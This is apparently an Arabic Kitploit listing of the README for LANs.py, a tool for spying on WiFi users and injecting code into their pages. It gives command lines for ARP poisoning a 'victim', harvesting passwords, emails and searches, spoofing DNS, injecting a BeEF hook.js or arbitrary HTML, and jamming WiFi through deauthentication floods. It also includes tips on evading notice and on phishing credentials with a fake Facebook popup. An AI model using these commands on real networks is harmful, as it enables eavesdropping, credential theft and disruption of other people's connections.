Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
LANs.py — حقن الكود والتجسس على مستخدمي الواي فاي | Kitploit
أدوات/GitHubGitHub/danmcinerney/lans.py
التقاط وتحليل الحزمأدوات التصيدتدقيق Wi-Fiاستغلال تطبيقات الويبجمع المعلوماتأمن الشبكاتاختبار الاختراقالفريق الأحمرتحليل DNS
GitHubdanmcinerney/lans.py

LANs.py

حقن الكود والتجسس على مستخدمي الواي فاي

2.6k488منذ 7 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

LANs.py

*** ملاحظة *** لم أعد أصون هذه الأداة. أوصي بشدة باستخدام bettercap بدلاً من ذلك لأغراض ARP و MITM.

  • البحث تلقائيًا عن أكثر مستخدمي شبكة WLAN نشاطًا ثم التجسس على أحدهم و/أو حقن HTML/JS تعسفي في الصفحات التي يزورونها.

    • يقوم بتسميم جداول ARP للجهاز المستهدف والموجه وخادم DNS عند الضرورة بشكل فردي. لا يقوم بتسميم أي شخص آخر على الشبكة. يعرض معظم الأجزاء المثيرة لاهتمام من حركة مرورهم ويمكنه حقن HTML مخصص في الصفحات التي يزورونها. ينظف بعد نفسه.
  • يمكن أيضًا استخدامه لتشويش مستمر على شبكات WiFi القريبة. هذا له نطاق تقريبي يبلغ نصف قطر كتلة واحدة، ولكن يمكن أن يختلف ذلك بناءً على قوة بطاقة WiFi الخاصة بك. يمكن ضبطه بدقة للسماح بتشويش الجميع أو حتى عميل واحد فقط. (لا يمكن تشويش WiFi والتجسس في وقت واحد)

المتطلبات الأساسية: Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (اختياري), nmap, nbtscan, وبطاقة لاسلكية قادرة على وضع التجسس إذا اخترت عدم استخدام الخيار -ip

تم اختباره على Kali 1.0. في الأمثلة التالية سيكون 192.168.0.5 هو الجهاز المهاجم و 192.168.0.10 هو الضحية.

جميع الخيارات:

root@kitploit:~
Python LANs.py  [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC]
                [-d] [-v] [-dns DNSSPOOF] [-a] [-set] [-p] [-na] [-n]
                [-i INTERFACE] [-r REDIRECTTO] [-rip ROUTERIP]
                [-rmac ROUTERMAC] [-pcap PCAP] [-s SKIP] [-ch CHANNEL]
                [-m MAXIMUM] [-no] [-t TIMEINTERVAL] [--packets PACKETS]
                [--directedonly] [--accesspoint ACCESSPOINT]

#الاستخدام

الاستخدام الشائع:

root@kitploit:~
python LANs.py -u -p

تحديد الهدف النشط الذي يقوم بانتحال ARP للهدف المختار وإخراج جميع البيانات غير HTTPS المثيرة للاهتمام التي يرسلها أو يطلبها. لا يوجد خيار -ip لذلك سيقوم بمسح ARP للشبكة، ومقارنتها بالتقاط حي قيد التشغيل في وضع التجسس، وسرد جميع العملاء على الشبكة. يحاول وضع علامة على الأهداف باسم netbios لنظام Windows ويطبع عدد حزم البيانات التي يرسلونها/يستقبلونها. القدرة على التقاط حزم البيانات التي يرسلونها تعتمد بشكل كبير على القرب المادي وقوة بطاقة الشبكة لديك. اضغط Ctrl-C عندما تكون مستعدًا واختر هدفك الذي سيقوم بعد ذلك بانتحال ARP له.

يدعم اعتراض وحصاد البيانات من البروتوكولات التالية: HTTP, FTP, IMAP, POP3, IRC. سيطبع أول 135 حرفًا من عناوين URL التي تمت زيارتها ويتجاهل عناوين URL التي تنتهي بـ .jpg, .jpeg, .gif, .css, .ico, .js, .svg، و .woff. سيطبع أيضًا جميع أسماء المستخدمين/كلمات المرور للبروتوكولات التي تم إدخالها، والعمليات البحثية التي تمت على أي موقع، ورسائل البريد الإلكتروني المرسلة/المستلمة، ورسائل IRC المرسلة/المستلمة. لقطة شاشة: http://i.imgur.com/kQofTYP.png

تشغيل LANs.py بدون وسيط سيعطيك قائمة الأهداف النشطة، وعند اختيار واحد، سيعمل كانتحال ARP بسيط.

استخدام شائع آخر:

root@kitploit:~
python LANs.py -u -p -d -ip 192.168.0.10

-d: فتح xterm مع driftnet لرؤية جميع الصور التي يعرضها

-ip: استهداف عنوان IP هذا وتخطي الاستهداف النشط في البداية

حقن HTML:

root@kitploit:~
python LANs.py -b http://192.168.0.5:3000/hook.js

حقن رابط BeEF hook (http://beefproject.com/, برنامج تعليمي: http://resources.infosecinstitute.com/beef-part-1/) في الصفحات التي يزورها الضحية. هذا ببساطة يلف الوسيطة في علامات <script> لذا يمكنك حقًا إدخال أي موقع لملف جافا سكريبت. يحاول الإدراج بعد أول علامة </head> يتم العثور عليها في HTML الصفحة.

root@kitploit:~
python LANs.py -c '<title>Owned.</title>'

حقن HTML تعسفي في الصفحات التي يزورها الضحية. يحاول أولاً حقنه بعد أول علامة <head>، وفي حالة الفشل، يحقنه قبل أول علامة </head>. هذا المثال سيغير عنوان الصفحة إلى 'Owned.'

القراءة من pcap:

root@kitploit:~
python LANs.py -pcap libpcapfilename -ip 192.168.0.10

للقراءة من ملف pcap يجب عليك تضمين عنوان IP الخاص بالهدف باستخدام الخيار -ip. يجب أن يكون أيضًا بصيغة libpcap وهي الأكثر شيوعًا على أي حال. إحدى مزايا القراءة من ملف pcap هي أنك لست بحاجة إلى أن تكون جذرًا لتنفيذ السكريبت.

انتحال DNS

root@kitploit:~
python LANs.py -a -r 80.87.128.67
root@kitploit:~
python LANs.py -dns eff.org

مثال 1: الخيار -a سينتحل كل طلب DNS يقوم به الضحية، وعند استخدامه مع -r، سيعيد توجيههم إلى عنوان وسيطة -r. سيتم إعادة توجيه الضحية إلى stallman.org (80.87.128.67) بغض النظر عما يكتبه في شريط العناوين.

مثال 2: هذا سينتحل نطاق eff.org والنطاقات الفرعية لـ eff.org. عندما لا تكون وسيطة -r موجودة مع وسيطات -a أو -dns، فإن السكريبت سيحدد افتراضيًا إرسال الضحية إلى عنوان IP الخاص بالمهاجم. إذا حاول الضحية الذهاب إلى eff.org، فسيتم إعادة توجيههم إلى IP المهاجم.

الاستخدام الأكثر عدوانية:

root@kitploit:~
python LANs.py -v -d -p -n -na -set -a -r 80.87.128.67 -c '<title>Owned.</title>' -b http://192.168.0.5:3000/hook.js -ip 192.168.0.10

تشويش جميع شبكات WiFi:

root@kitploit:~
python LANs.py

جميع الخيارات:


الاستخدام العادي:

  • -b BEEF_HOOK_URL: نسخ رابط BeEF hook لحقنه في كل صفحة يزورها الضحية، مثال: -b http://192.168.1.10:3000/hook.js

  • -c 'HTML CODE': حقن كود HTML تعسفي في الصفحات التي يزورها الضحية؛ قم بتضمين علامات الاقتباس عند اختيار HTML للحقن

  • -d: فتح xterm مع driftnet لرؤية جميع الصور التي يعرضونها

  • -dns DOMAIN: انتحال DNS لنطاق DOMAIN. مثال: -dns facebook.com سينتحل DNS كل طلب DNS إلى facebook.com أو subdomain.facebook.com

  • -a: انتحال كل استجابة DNS يقوم بها الضحية، مما يخلق بشكل فعال صفحة بوابة محجوزة؛ يمكن استخدام الخيار -r مع هذا

  • -r IPADDRESS: لاستخدامه فقط مع الخيار -dns DOMAIN؛ إعادة توجيه المستخدم إلى عنوان IPADDRESS هذا عند زيارة DOMAIN

  • -u: طباعة عناوين URL التي تمت زيارتها؛ تقتطع عند 150 حرفًا وتقوم بتصفية عناوين URL للصور/css/js/woff/svg لأنها تزعج الإخراج وهي غير مثيرة للاهتمام

  • -i INTERFACE: تحديد الواجهة؛ الافتراضي هو أول واجهة في ip route، مثال: -i wlan0

  • -ip: استهداف عنوان IP هذا

  • -n: إجراء فحص nmap سريع للهدف

  • -na: إجراء فحص nmap عدواني في الخلفية وإخراج النتيجة إلى [عنوان IP الضحية].nmap.txt

  • -p: طباعة أسماء المستخدمين/كلمات المرور لـ FTP/IMAP/POP/IRC/HTTP، وطلبات HTTP POST التي تمت، وجميع عمليات البحث التي تمت، ورسائل البريد الإلكتروني الواردة/الصادرة، ورسائل IRC المرسلة/المستلمة

  • -pcap PCAP_FILE: تحليل جميع الحزم في ملف pcap؛ يتطلب وسيطة -ip [عنوان IP الهدف]

  • -rmac ROUTER_MAC: أدخل MAC الخاص بالموجه هنا إذا كنت تواجه مشكلة في جعل السكريبت يحضره تلقائيًا

  • -rip ROUTER_IP: أدخل IP الخاص بالموجه هنا إذا كنت تواجه مشكلة في جعل السكريبت يحضره تلقائيًا

  • -v: إظهار عناوين URL مفصلة لا تقتطع عند 150 حرفًا مثل -u

تشويش WiFi:

  • -s MAC_Address_to_skip: تحديد عنوان MAC لتخطي إلغاء المصادقة له. مثال: -s 00:11:BB:33:44:AA
  • -ch CHANNEL: تقييد wifijammer بقناة واحدة
  • -m MAXIMUM: الحد الأقصى لعدد العملاء لإلغاء مصادقتهم. استخدمه إذا كنت تتحرك لمنع إلغاء مصادقة أزواج عميل/نقطة وصول خارج النطاق الحالي.
  • -no: لا تقم بمسح قائمة إلغاء المصادقة عند الوصول إلى الحد الأقصى (-m) لعدد مجموعات عميل/نقطة وصول. يجب استخدامه مع -m. مثال: -m 10 -n
  • -t TIME_INTERVAL: الوقت بين كل حزمة إلغاء مصادقة. الافتراضي هو الحد الأقصى. إذا رأيت أخطاء scapy مثل 'no buffer space' جرب: -t .00001
  • --packets NUMBER: عدد الحزم لإرسالها في كل دفعة إلغاء مصادقة. الافتراضي هو حزمة واحدة.
  • --directedonly: لا ترسل حزم إلغاء مصادقة إلى عنوان البث لنقاط الوصول وأرسل فقط إلى أزواج عميل/نقطة وصول
  • --accesspoint ROUTER_MAC: أدخل عنوان MAC لنقطة وصول معينة لاستهدافها.

التنظيف

عند استقبال Ctrl-C:

-إيقاف تشغيل إعادة توجيه IP

-مسح جدار الحماية iptables

-استعادة جداول ARP للموجه والضحية بشكل فردي

تفاصيل تقنية

يستخدم هذا السكريبت قائمة انتظار nfqueue-bindings بايثون ملفوفة في Twisted IReadDescriptor لتغذية الحزم إلى دوال رد الاتصال. يتم استخدام nfqueue-bindings لإسقاط وإعادة توجيه حزم معينة. تقوم مكتبة scapy الخاصة ببايثون بعمل تحليل الحزم وحقنها.

حقن الكود دون اكتشافه لعبة صعبة، إذا حدث خطأ بسيط أو قام الخادم الذي يطلب الضحية البيانات منه بتنفيذ الأمور بطريقة فريدة أو نادرة، فلن يتمكن المستخدم من فتح الصفحة التي يحاول عرضها وسيدرك أن هناك شيئًا ما. تم تصميم هذا السكريبت لإعادة توجيه الحزم إذا فشل أي شيء، لذا أثناء الاستخدام قد ترى الكثير من "[!] Injected packet for www.domain.com" ولكن ترى نطاقًا واحدًا أو اثنين فقط على لوحة BEeF التي تم ربط المتصفح بها. هذا أمر مقبول. إذا لم يتم ربطهم على الصفحة الأولى فقط انتظر حتى يتصفحوا بعض الصفحات الأخرى. الهدف هو أن تكون غير ملحوظ. أدوات BEeF المفضلة لدي هي في Commands > Social Engineering. قم بأشياء مثل إنشاء نافذة منبثقة فيسبوك رسمية المظهر تقول أن مصادقة المستخدم قد انتهت وأنه يجب إعادة إدخال بيانات الاعتماد الخاصة بهم.


  • danmcinerney.org
  • Analytics
تنزيل الأداة